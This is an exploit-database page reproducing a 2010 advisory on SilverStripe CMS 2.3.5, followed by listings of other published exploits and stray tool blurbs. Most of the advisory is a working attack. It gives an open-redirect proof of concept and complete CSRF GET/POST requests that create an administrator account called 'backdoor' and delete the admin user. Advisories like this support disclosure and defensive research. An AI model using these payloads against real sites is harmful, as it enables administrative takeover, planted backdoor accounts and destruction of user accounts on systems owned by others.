Menu

Search for hundreds of thousands of exploits

"SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection"

Author

Exploit author

cp77fk4r

Platform

Exploit platform

php

Release date

Exploit published date

2010-01-24

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: Silverstripe <= 2.3.5 Cross Site Request Forgery & Open Redirection.
# Date: 12/01/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Vendor: www.silverstripe.org | 
# Version: 2.0.0
# Tested on: PHP
#
#
##Open Redirection:
(OWASP: An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.)
#
http://server/Security/login?BackURL=[URL]
#
PoC:
http://server/Security/login?BackURL=http://www.google.com
#
#
##Cross Site Request Forgery
(CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.)
#
Add new Superuser Account:
#
HTTP GET: /admin/security/EditForm?fieldName=Members&action_callfieldmethod&methodName=addtogroup
HTTP POST: ajax=1&Title=Administrators&MemberSearch=&ctf%5BID%5D=1&MemberFieldName=Members&MemberDontShowPassword=&MemberFilterButton=Filter&FirstName=[BACKDOOR]&Surname=[BACKDOOR]&Email=[MAIL]&SetPassword=[BACKDOOR]&ctf%5BID%5D=1&SecurityID=160711687&action_addtogroup%3FformController%3Dadmin%2Fsecurity%2FEditForm%2Ffield%2FMembers%2FAddRecordForm=Add&Permissions%5B1%5D%5BArg%5D=0&Permissions%5Bnew%5D%5BArg%5D%5B%5D=&ID=1&SecurityID=160711687
#
PoC: (Username: backdoor; Password: backdoor)
HTTP GET: /admin/security/EditForm?fieldName=Members&action_callfieldmethod&methodName=addtogroup
HTTP POST: ajax=1&Title=Administrators&MemberSearch=&ctf%5BID%5D=1&MemberFieldName=Members&MemberDontShowPassword=&MemberFilterButton=Filter&FirstName=backdoor&Surname=backdoor&Email=blah%40blah.blah&SetPassword=backdoor&ctf%5BID%5D=1&SecurityID=160711687&action_addtogroup%3FformController%3Dadmin%2Fsecurity%2FEditForm%2Ffield%2FMembers%2FAddRecordForm=Add&Permissions%5B1%5D%5BArg%5D=0&Permissions%5Bnew%5D%5BArg%5D%5B%5D=&ID=1&SecurityID=160711687
#
#
Delete user: [id]=user id (by default, the admin id is 1)
#
HTTP GET: /admin/security/EditForm/field/Members/item/[id]/delete
HTTP POST: forceajax=1
#
PoC: (delete the Admin account)
HTTP GET: /admin/security/EditForm/field/Members/item/1/delete
HTTP POST: forceajax=1
#
#
[e0f]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2010-06-22 "SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities" webapps php cp77fk4r
2010-06-22 "PHP Event Calendar 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-06-13 "PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-05-30 "Nginx 0.6.36 - Directory Traversal" remote multiple cp77fk4r
2010-05-18 "phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path" webapps php cp77fk4r
2010-04-13 "Blog System 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-04-12 "Blog System 1.x - Multiple Input Validation Vulnerabilities" webapps php cp77fk4r
2010-04-08 "Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities" remote multiple cp77fk4r
2010-04-08 "miniature java Web server 1.71 - Multiple Vulnerabilities" remote multiple cp77fk4r
2010-04-03 "SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities" webapps asp cp77fk4r
2010-04-03 "Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting" remote multiple cp77fk4r
2010-03-27 "Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-11 "PHP Captcha Security Images - Denial of Service" dos php cp77fk4r
2010-02-09 "MOJO's IWms 7 - SQL Injection / Cross-Site Scripting" webapps asp cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting" webapps java cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-01-24 "SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection" webapps php cp77fk4r
2010-01-21 "SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery" webapps windows cp77fk4r
2009-12-25 "cms -db 0.7.13 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-22 "DeluxeBB 1.3 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-21 "social Web CMS Beta 2 - Multiple Vulnerabilities" webapps php cp77fk4r
2007-12-17 "MOJO IWms 7 - 'default.asp' Cookie Manipulation" webapps asp cp77fk4r 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected